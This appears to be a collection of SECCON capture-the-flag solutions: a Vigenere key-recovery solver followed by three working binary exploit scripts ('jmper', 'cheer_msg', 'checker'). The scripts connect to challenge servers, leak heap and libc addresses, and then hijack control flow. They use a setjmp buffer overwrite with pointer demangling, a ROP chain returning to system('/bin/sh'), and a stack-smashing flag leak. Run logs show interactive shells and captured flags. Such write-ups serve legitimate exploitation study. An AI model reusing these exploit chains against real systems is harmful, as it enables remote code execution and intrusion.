
[문제]

Vigenere

k: ????????????

p: SECCON{???????????????????????????????????}

c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ

k=key, p=plain, c=cipher, md5(p)=f528a6ab914c1ecf856a1d93103948fe

[풀이]

import hashlib
import itertools
import md5

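# Known plaintext prefix and ciphertext from the challenge statement; "?"
# marks the 36 unknown plaintext characters. The alphabet has 28 symbols:
# A-Z plus the two flag braces.
p = "SECCON{???????????????????????????????????}"
c = 'LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ'
m = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}"
# MD5 hex digest of the full plaintext, as given in the statement.
TARGET_MD5 = "f528a6ab914c1ecf856a1d93103948fe"
# The statement shows the key as twelve "?" characters.
KEY_LEN = 12
KNOWN_PREFIX = "SECCON{"


def _indices(text, alphabet):
    """Map each character of ``text`` to its position in ``alphabet``.

    Raises:
        ValueError: if a character is not in ``alphabet``. (The original
            silently skipped such characters, which would desynchronise
            the key stream.)
    """
    return [alphabet.index(ch) for ch in text]


def _decode(cipher_idx, key_idx, alphabet):
    """Decrypt index lists: plain[i] = cipher[i] - key[i mod len(key)]."""
    n = len(alphabet)
    klen = len(key_idx)
    return "".join(alphabet[(ci - key_idx[i % klen]) % n]
                   for i, ci in enumerate(cipher_idx))


def recover_key_prefix(plain, cipher, alphabet=m):
    """Return the key characters covered by a known plaintext prefix.

    For a Vigenere cipher over ``alphabet``, key[i] = cipher[i] - plain[i]
    (mod alphabet size). Only the first ``len(plain)`` characters of
    ``cipher`` are used; if ``cipher`` is shorter, the result is shorter.

    Args:
        plain: known plaintext prefix (every character in ``alphabet``).
        cipher: ciphertext aligned with ``plain``.
        alphabet: ordered symbol set of the cipher.

    Returns:
        The recovered key prefix.

    Raises:
        ValueError: if a character of either input is outside ``alphabet``.
    """
    n = len(alphabet)
    plain_idx = _indices(plain, alphabet)
    cipher_idx = _indices(cipher[:len(plain)], alphabet)
    # Negative differences wrap naturally under the modulo.
    return "".join(alphabet[(ci - pi) % n]
                   for pi, ci in zip(plain_idx, cipher_idx))


def vigenere_decrypt(cipher, key, alphabet=m):
    """Decrypt ``cipher`` with ``key`` repeated cyclically over ``alphabet``.

    Args:
        cipher: ciphertext (every character in ``alphabet``).
        key: non-empty key (every character in ``alphabet``).
        alphabet: ordered symbol set of the cipher.

    Returns:
        The plaintext, the same length as ``cipher``.

    Raises:
        ValueError: if ``key`` is empty or any character of ``cipher`` or
            ``key`` is outside ``alphabet``.
    """
    if not key:
        raise ValueError("key must not be empty")
    return _decode(_indices(cipher, alphabet), _indices(key, alphabet),
                   alphabet)


def brute_force_key(cipher, known_prefix, key_len, digest, alphabet=m):
    """Extend ``known_prefix`` to ``key_len`` characters by exhaustive search.

    Every candidate key is tried until the MD5 hex digest of the decrypted
    text equals ``digest``. The search space is
    ``len(alphabet) ** (key_len - len(known_prefix))`` candidates, so this
    is slow for more than a few unknown characters.

    Args:
        cipher: ciphertext to decrypt.
        known_prefix: key characters already recovered.
        key_len: total key length (positive).
        digest: expected MD5 hex digest of the plaintext.
        alphabet: ordered symbol set of the cipher.

    Returns:
        ``(key, plaintext)`` for the first match, or ``None`` if no
        candidate matches.

    Raises:
        ValueError: if ``key_len`` is not positive or ``known_prefix`` is
            longer than ``key_len``.
    """
    if key_len < 1:
        raise ValueError("key_len must be positive")
    missing = key_len - len(known_prefix)
    if missing < 0:
        raise ValueError("known prefix is longer than the key")
    n = len(alphabet)
    # Index lists are computed once; only the unknown tail varies per
    # candidate, so the inner loop does no alphabet scans.
    cipher_idx = _indices(cipher, alphabet)
    prefix_idx = _indices(known_prefix, alphabet)
    for tail in itertools.product(range(n), repeat=missing):
        flag = _decode(cipher_idx, prefix_idx + list(tail), alphabet)
        if hashlib.md5(flag.encode("ascii")).hexdigest() == digest:
            return known_prefix + "".join(alphabet[i] for i in tail), flag
    return None


def main():
    """Recover the key prefix from the known plaintext, then brute-force the rest."""
    prefix = recover_key_prefix(KNOWN_PREFIX, c)
    print("[+] key: " + prefix + "?" * (KEY_LEN - len(prefix)))
    print("[!] b/f ...")
    found = brute_force_key(c, prefix, KEY_LEN, TARGET_MD5)
    if found is None:
        print("[-] no key of length %d matched the digest" % KEY_LEN)
        return
    key, flag = found
    print("[+] key: " + key)
    print("[+] flag: " + flag)


if __name__ == "__main__":
    main()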

'''
blackcon@bk{~/seccon/crypto}:python vigenere.py
[+] key: VIGENER?????
[!] b/f ...
[+] key: VIGENERECODE
[+] flag: SECCON{ABABABCDEDEFGHIJJKLMNOPQRSTTUVWXYYZ}
'''
#!/usr/bin/env python
import socket
import telnetlib
import struct
from collections import deque

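def p( x ):
    """Pack ``x`` as a little-endian unsigned 32-bit value (4 bytes).

    Raises struct.error if ``x`` does not fit in 32 bits.
    """
    return struct.pack( "<I", x )


def up( x ):
    """Unpack a little-endian unsigned 32-bit value from exactly 4 bytes.

    Raises struct.error if ``x`` is not exactly 4 bytes long.
    """
    return struct.unpack( "<I", x )[0]


# Endpoint from the writeup. The original first assigned "localhost" and
# immediately overwrote it; that dead assignment is dropped.
host = "jmper.pwn.seccon.jp"
port = 5656

# Plain blocking TCP socket; the rest of the script drives it directly.
s =  socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, port ) )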

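def u_recv( st ):
    """Read from the module-level socket ``s`` until ``st`` has been seen.

    One byte per recv() on purpose: nothing may be consumed past the
    marker, because callers go on to read the bytes that follow it.

    Args:
        st: marker string to wait for.

    Returns:
        Everything received, up to and including the first occurrence of
        ``st``.

    Raises:
        EOFError: if the peer closes the connection before ``st`` arrives.
            Without this check an empty recv() result would spin forever,
            since ``bf`` never grows.
    """
    bf = ''
    while st not in bf:
        ch = s.recv( 1 )
        if not ch:
            raise EOFError( "connection closed while waiting for %r" % ( st, ) )
        bf += ch
    return bf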

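def ror( val, rotate, width=None ):
    """Rotate the bits of ``val`` right by ``rotate`` positions.

    Args:
        val: non-negative integer to rotate.
        rotate: number of positions; a negative value rotates left, and
            values beyond ``width`` wrap around.
        width: bit width of the rotation window. Defaults to the number of
            significant bits of ``val`` (at least 1), which is exactly what
            the previous deque-over-``bin(val)`` implementation rotated
            within; pass e.g. ``width=64`` for a fixed-size rotation.

    Returns:
        The rotated value as an int.
    """
    if width is None:
        # bin(val)[2:] carries no leading zeros, so the old code rotated
        # within val.bit_length() characters ("0" for val == 0).
        width = max( val.bit_length(), 1 )
    rotate %= width
    mask = (1 << width) - 1
    val &= mask
    return ((val >> rotate) | (val << (width - rotate))) & mask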

# Interaction script for the "jmper" challenge service. Every step waits
# for a menu prompt with u_recv() and answers it. Options seen on the wire:
# 1 ("Add student.", no further prompt), 2 ("Input name:"), 3
# ("Input memo:"), 4 and 5 (print an entry back) and 6 ("Bye :)").
# The stage headings are the author's; the added comments describe only
# the bytes exchanged and where the reply parsing is fragile. All
# addresses and offsets are values the author recorded for this
# challenge's binary and libc build and are not portable.

# Select option 1 thirty times; only the menu footer is consumed each time.
for i in range( 30 ):
    u_recv( "6. Bye :)" )
    s.send( "1\n" )

## stage 1: leak the heap addr
# Memo of ID 0 := 32 filler bytes plus a newline.
u_recv( "6. Bye :)" )
s.send( "3\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input memo:" )
s.send( "a"*32 + "\n" )

# Option 5 on ID 0 prints the entry; the bytes after the filler, up to
# the next "1." menu text, are unpacked as a little-endian 32-bit value.
u_recv( "6. Bye :)" )
s.send( "5\n" )
u_recv( "ID:" )
s.send( "0\n" )
# NOTE(review): one recv() may return less than the whole reply; the
# splits below then raise IndexError, and up() needs exactly 4 bytes.
data = s.recv( 1024 )
data = data.split( "a"*32 )[1]
heap = up(data.split( "1." )[0])
# Fixed distance below the leaked pointer, chosen by the author.
jmpbuf = heap-0x110
print hex( heap )

## stage 2:leak the puts@got
# Memo of ID 1 := 32 filler bytes plus the single byte 0x78, no newline.
u_recv( "6. Bye :)" )
s.send( "3\n" )
u_recv( "ID:" )
s.send( "1\n" )
u_recv( "Input memo:" )
s.send( "a"*32 + "\x78" )

# Name of ID 1 := the packed 4-byte address from the author's comment.
u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "1\n" )
u_recv( "Input name:" )
s.send( p( 0x601fa0 )+"\n" ) # puts@got: 0x601fa0

# Option 4 on ID 1 prints the entry; 6 bytes are read, zero-padded to 8
# and unpacked as a 64-bit value. recv(6) may legitimately return fewer
# bytes, and the padding would then silently produce a wrong base.
u_recv( "6. Bye :)" )
s.send( "4\n" )
u_recv( "ID:" )
s.send( "1\n" )
base = s.recv(6)
while len(base)<8:
    base += "\x00"
base = struct.unpack("<Q", base)[0]-0x6fd60 #puts_offset: 0x6fd60
system = base+0x46590 # system_offset: 0x46590
print map( hex, [base, system] )


## stage 3:
# (No description in the original.) Memo of ID 0 := 32 filler bytes plus
# the byte 0x08, then name of ID 0 := packed jmpbuf+0x28. p() packs 32
# bits, so the heap-derived values must fit in 4 bytes.
u_recv( "6. Bye :)" )
s.send( "3\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input memo:" )
s.send( "a"*32 + "\x08" )

u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input name:" )
s.send( p( jmpbuf+0x28 )+"\n" )

## stage 4:leak the randomvalue(fs:30)
# Name of ID 0 := 8 filler bytes.
pay = "a"*0x8
u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input name:" )
s.send( pay+"\n" )

# Option 4 on ID 0 prints the entry; everything after the filler up to
# the "1. Add student." menu text is taken, the first 8 bytes skipped, and
# the rest unpacked as a 64-bit value (struct.unpack needs exactly 8).
u_recv( "6. Bye :)" )
s.send( "4\n" )
u_recv( "ID:" )
s.send( "0\n" )
leak = u_recv( "1. Add student." )
leak = leak.split( pay )[1]
leak = struct.unpack( "<Q", leak.split( "1. Add student." )[0][8:] )[0]

# Undo the transformation on the leaked value: as a zero-padded 64-bit
# string, rotate right by one bit 0x11 times, then XOR with 0x400c31
# (presumably the value known to have been stored there -- TODO confirm).
# The XOR runs on every iteration although only the final value is used;
# ror() defined above is not used here.
t = bin(leak)[2:]
t = '0'*(64-len(t)) + t
for i in range(0x11):
       t = t[-1] + t[:-1]
       rnd = int(t,2) ^ 0x400c31

## stage 5: write the new_rip
# Memo of ID 0 := 32 filler bytes plus the byte 0x48, then name of ID 0 :=
# packed jmpbuf+0x38.
u_recv( "6. Bye :)" )
s.send( "3\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input memo:" )
s.send( "a"*32 + "\x48" )
u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input name:" )
s.send( p( jmpbuf+0x38 )+"\n" )

# Inverse of the stage-4 transform: XOR system with rnd, then rotate left
# by one bit 0x11 times. new_rip is likewise reassigned on every iteration.
t = system ^ rnd
t = bin(t)[2:]
t = '0'*(64-len(t)) + t
for i in range(0x11):
       t = t[1:] + t[0]
       new_rip = int(t,2)

# Name of ID 0 := the 8-byte little-endian new_rip value.
new_rip = struct.pack( "<Q", new_rip )
u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input name:" )
s.send( new_rip+"\n" )

## stage 6: write the cmd
# Memo of ID 0 := 32 filler bytes plus the byte 0x10, then name of ID 0 :=
# packed jmpbuf.
u_recv( "6. Bye :)" )
s.send( "3\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input memo:" )
s.send( "a"*32 + "\x10" )
u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input name:" )
s.send( p( jmpbuf )+"\n" )

# Name of ID 0 := the NUL-terminated command string.
cmd = "/bin/sh\x00"
u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input name:" )
s.send( cmd+"\n" )

# Option 1 once more, then the socket is handed to telnetlib for
# interactive use (t is rebound from the string above to a Telnet object).
u_recv( "6. Bye :)" )
s.send( "1\n" )

t = telnetlib.Telnet()
t.sock = s
t.interact()

'''
blackcon@bk{~/seccon/exploit/jmper}:./pay.py
0x243d220
['0x7f704f704000', '0x7f704f74a590']

Exception has occurred. Jump!
id
uid=10987 gid=10000 groups=10000
ls
flag
jmper
cat flag
SECCON{3nj0y_my_jmp1n9_serv1ce}
'''
#!/usr/bin/env python
import socket
import struct
import telnetlib
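def p( x ):
    """Pack ``x`` as a little-endian unsigned 32-bit value (4 bytes).

    Raises struct.error if ``x`` does not fit in 32 bits.
    """
    return struct.pack( "<I", x )


def up( x ):
    """Unpack a little-endian unsigned 32-bit value from exactly 4 bytes.

    Raises struct.error if ``x`` is not exactly 4 bytes long.
    """
    return struct.unpack( "<I", x )[0]


# Endpoint from the writeup. The original first assigned "localhost" and
# immediately overwrote it; that dead assignment is dropped.
host = "cheermsg.pwn.seccon.jp"
port = 30527

# Plain blocking TCP socket; the rest of the script drives it directly.
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, port ) )

# Addresses the author recorded for the challenge binary (the names are
# the author's); they are specific to that build.
pppr = 0x80487ad
setbuf_got = 0x804A00c
printf_plt = 0x8048430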

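def u_recv( st ):
    """Read from the module-level socket ``s`` until ``st`` has been seen.

    One byte per recv() on purpose: nothing may be consumed past the
    marker, because callers go on to read the bytes that follow it.

    Args:
        st: marker string to wait for.

    Returns:
        Everything received, up to and including the first occurrence of
        ``st``.

    Raises:
        EOFError: if the peer closes the connection before ``st`` arrives.
            Without this check an empty recv() result would spin forever,
            since ``bf`` never grows.
    """
    bf = ''
    while st not in bf:
        ch = s.recv( 1 )
        if not ch:
            raise EOFError( "connection closed while waiting for %r" % ( st, ) )
        bf += ch
    return bf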

# Interaction script for the "cheer_msg" service. Prompts seen on the
# wire are "Message Length >>" and "Message >>". The stage headings and
# the right-hand comments are the author's; the added comments describe
# the bytes exchanged and where the reply parsing is fragile. All
# addresses and offsets are values the author recorded for this
# challenge's binary and libc build and are not portable.

## stage 1 ##
# Answer the length prompt with a negative value, then send a sequence of
# packed 32-bit values in place of the message text.
u_recv( "Message Length >>" )
s.send( "-150\n" )
u_recv( "Message >>" )

pay = p( printf_plt )
pay += p( pppr )
pay += p( 0x804887d ) # \nThank you %s!\nMessage : %s\n
pay += p( setbuf_got )
pay += p( setbuf_got )
pay += p( 0x80485ca ) # main

s.send( pay+"\n" )
# "Message : " is awaited twice; the first reply is discarded and the
# second parsed: the bytes between "Thank you " and the first "!\n" are
# taken and the leading four unpacked as a little-endian 32-bit value.
# up() raises struct.error if fewer than four bytes precede that "!\n".
data = u_recv( "Message : " )
data = u_recv( "Message : " )
data = data.split( "Thank you " )[1]
leak = data.split( "!\n" )[0]
leak = up( leak[:4] )

# libc offsets the author recorded for the target's libc build.
libc_base = leak - 0x00067b20    # setbuf offset: 0x67b20
system = libc_base + 0x00040310    # system offset: 0x40310
binsh  = libc_base + 0x16084c    # binsh offset: 0x16084c

## stage 2 ##
# Same negative length, then three packed 32-bit values built from the
# computed addresses; afterwards the socket is handed to telnetlib for
# interactive use.
u_recv( "Message Length >>" )
s.send( "-150\n" )
u_recv( "Message >>" )

pay = p( system )
pay += p( 0x41414141 )
pay += p( binsh )
s.send( pay+"\n" )
print '#####'

t = telnetlib.Telnet()
t.sock = s
t.interact()

'''
blackcon@bk{~/seccon/exploit/cheer_msg}:./pay.py 
#####

Oops! I forgot to ask your name...
Can you tell me your name?

Name >> 
Thank you sY�AAAALxk�!
Message : 
id
uid=10792 gid=1001(cheer_msg) groups=1001(cheer_msg)
ls
cheer_msg
flag.txt
run.sh
cat flag.txt
SECCON{N40.T_15_ju571c3}
'''
#!/usr/bin/env python
import socket

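# Endpoint from the writeup. The original first assigned localhost:1120
# and immediately overwrote both values; those dead assignments are
# dropped.
host = "checker.pwn.seccon.jp"
port = 14726

# Plain blocking TCP socket; the rest of the script drives it directly.
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, port ) )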

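def u_recv( st ):
    """Read from the module-level socket ``s`` until ``st`` has been seen.

    One byte per recv() on purpose: nothing may be consumed past the
    marker, because callers go on to read the bytes that follow it.

    Args:
        st: marker string to wait for.

    Returns:
        Everything received, up to and including the first occurrence of
        ``st``.

    Raises:
        EOFError: if the peer closes the connection before ``st`` arrives.
            Without this check an empty recv() result would spin forever,
            since ``bf`` never grows.
    """
    bf = ''
    while st not in bf:
        ch = s.recv( 1 )
        if not ch:
            raise EOFError( "connection closed while waiting for %r" % ( st, ) )
        bf += ch
    return bf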

# Interaction script for the "checker" service. Prompts seen on the wire
# are "NAME :", ">>" and "FLAG :"; each u_recv() result is printed so the
# transcript is visible.
print u_recv( "NAME :" )
s.send( "name\n" );

# Sixteen answers to the ">>" prompt, each a run of "a" bytes whose
# length counts down from 0x180 to 0x171.
for i in range( 0x180, 0x170, -1 ):
    u_recv( ">>" )
    pay = ("a"*i)+"\n"
    s.send( pay )

print u_recv( ">>" )
s.send( "yes\n" )
print u_recv( "FLAG :" )

# 0x178 filler bytes followed by the three bytes the author labels "flag"
# (a value recorded for this challenge's binary; not portable).
pay = "a"*0x178
pay += "\xc0\x10\x60"    # flag
s.send( pay+"\n" )

# Three fixed-size reads; each recv() may return fewer than 1024 bytes and
# blocks if the peer sends nothing more.
print s.recv( 1024 )
print s.recv( 1024 )
print s.recv( 1024 )

'''
blackcon@bk{~/seccon/exploit/checker}:./pay.py 
Hello! What is your name?
NAME :

Do you know flag?
>>

Oh, Really??
Please tell me the flag!
FLAG :

You are a liar...

*** stack smashing detected ***: SECCON{y0u_c4n'7_g37_4_5h3ll,H4h4h4} terminated
'''
